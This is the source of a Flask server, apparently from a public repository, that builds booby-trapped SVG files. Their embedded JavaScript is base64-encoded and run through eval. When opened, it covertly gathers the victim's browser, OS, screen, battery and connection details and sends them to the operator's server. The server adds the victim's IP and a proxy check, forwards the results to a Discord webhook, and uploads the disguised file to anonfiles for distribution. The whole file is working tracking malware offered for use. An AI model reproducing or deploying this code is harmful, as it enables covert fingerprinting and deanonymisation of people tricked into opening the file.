-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathserver.py
176 lines (141 loc) · 5.24 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
from flask import Flask, request, send_file
import requests
import json
from os import system
from urllib.request import urlopen
import io
import base64
import urllib.parse
import random
from dhooks import Webhook,Embed
apiurl = "YOURLINK"
app = Flask(__name__)
PAYLOAD_TEMPLATE = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="0" height="0" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
%(js_code)s
</script>
</svg>"""
def jsp_payloadd(id, apiurl,cdn):
return '''
function getCurrentInfo() {
const userAgent = navigator.userAgent;
const operatingSystem = navigator.platform;
const browser = navigator.appName;
const browserVersion = navigator.appVersion;
const language = navigator.language;
const currentTime = new Date();
const screenSize = `${screen.width}x${screen.height}`;
const devicePixelRatio = window.devicePixelRatio;
const documentDimensions = `${document.documentElement.clientWidth}x${document.documentElement.clientHeight}`;
const windowSize = `${window.innerWidth}x${window.innerHeight}`;
let connectionType = null;
if ('connection' in navigator) {
connectionType = navigator.connection.effectiveType;
}
let batteryCharging = null;
let batteryLevel = null;
if ('getBattery' in navigator) {
navigator.getBattery().then(battery => {
batteryCharging = battery.charging;
batteryLevel = battery.level;
});
}
// Build query string
const queryString = `?data=${btoa(
`user_agent=${encodeURIComponent(userAgent)}` +
`&operating_system=${encodeURIComponent(operatingSystem)}` +
`&browser=${encodeURIComponent(browser)}` +
`&browser_version=${encodeURIComponent(browserVersion)}` +
`&language=${encodeURIComponent(language)}` +
`&current_time=${encodeURIComponent(currentTime.toString())}` +
`&screen_size=${encodeURIComponent(screenSize)}` +
`&device_pixel_ratio=${encodeURIComponent(devicePixelRatio)}` +
`&document_dimensions=${encodeURIComponent(documentDimensions)}` +
`&window_size=${encodeURIComponent(windowSize)}` +
`&connection_type=${encodeURIComponent(connectionType)}` +
`&battery_charging=${encodeURIComponent(batteryCharging)}` +
`&battery_level=${encodeURIComponent(batteryLevel)}&id='''+str(id)+'''`,
)}`;
// Send request to server
fetch(`'''+apiurl+'''${queryString}`, {
mode: 'no-cors',
method: 'POST',
})
}
getCurrentInfo();
window.location.href = "'''+cdn+'''"'''
def jsp_payload(id,apiurl,cdn):
tempelate = jsp_payloadd(id,apiurl,cdn)
message_bytes = tempelate.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
first_half = base64_bytes.decode('ascii')
return """
var decodedJS = atob(`"""+first_half+"""`);
eval(decodedJS);
setTimeout(() => { window.location.href = "https://anonfiles.com"}, 5000);
"""
@app.route("/",methods=['POST'])
def main():
if request.environ.get('HTTP_X_FORWARDED_FOR') is None:
publicip = request.environ['REMOTE_ADDR']
else:
publicip = request.environ['HTTP_X_FORWARDED_FOR']
r = requests.get(f"https://api.xdefcon.com/proxy/check/?ip={publicip}").text
if 'proxy": true,' in r:
proxy=True
else:
proxy=False
base64en = request.args['data']
#print(base64en)
decoded_str = base64.b64decode(base64en).decode('utf-8')
decoded_string = urllib.parse.unquote(decoded_str)
decoded_stringg = decoded_string.split("&")
embed = Embed(color=0xFF0000,
timestamp='now' )
embed.add_field(name="Ip", value=publicip.rstrip(),inline=False)
embed.add_field(name="Proxy", value=proxy,inline=False)
for item in decoded_stringg:
if "id=" in item:
id = item.split("id=")
id = id[1]
with open("users.txt","r") as f:
for line in f:
if id in line:
line = line.split("|")
hook = Webhook(line[1].rstrip())
for line in decoded_stringg:
line = line.split("=")
decoded_stringg = line[0].replace("amp;","")
embed.add_field(name=decoded_stringg.rstrip(), value=line[1].rstrip(),inline=False)
#print(line+'\n')
hook.send(embed=embed)
#print(userAgent)
return "worked", 200
@app.route('/build', methods=['POST'])
def build():
cdn = request.form['cdn']
fn = request.form['filename']
webhook = request.form['webhook']
id = random.randint(100000000, 999999999)
f = open("users.txt","a")
f.write(f"{id}|{webhook}\n")
f.close()
#filename = request.form['filename']
def exploit(payload_name, js_payload):
mem_f = io.BytesIO((PAYLOAD_TEMPLATE % {'js_code': js_payload}).encode())
res = requests.post('https://api.anonfiles.com/upload', files={'file': (payload_name, mem_f)})
if res.status_code == 200:
json_data = res.json()
return json_data['data']['file']['url']['full']
return None
payload = jsp_payload(id,apiurl,cdn)
print(payload)
dl_link = exploit(fn, payload)
return f'{dl_link}'
@app.route('/alive/')
def alive():
return 'alive'
app.run(debug=False,host='0.0.0.0', port=8000)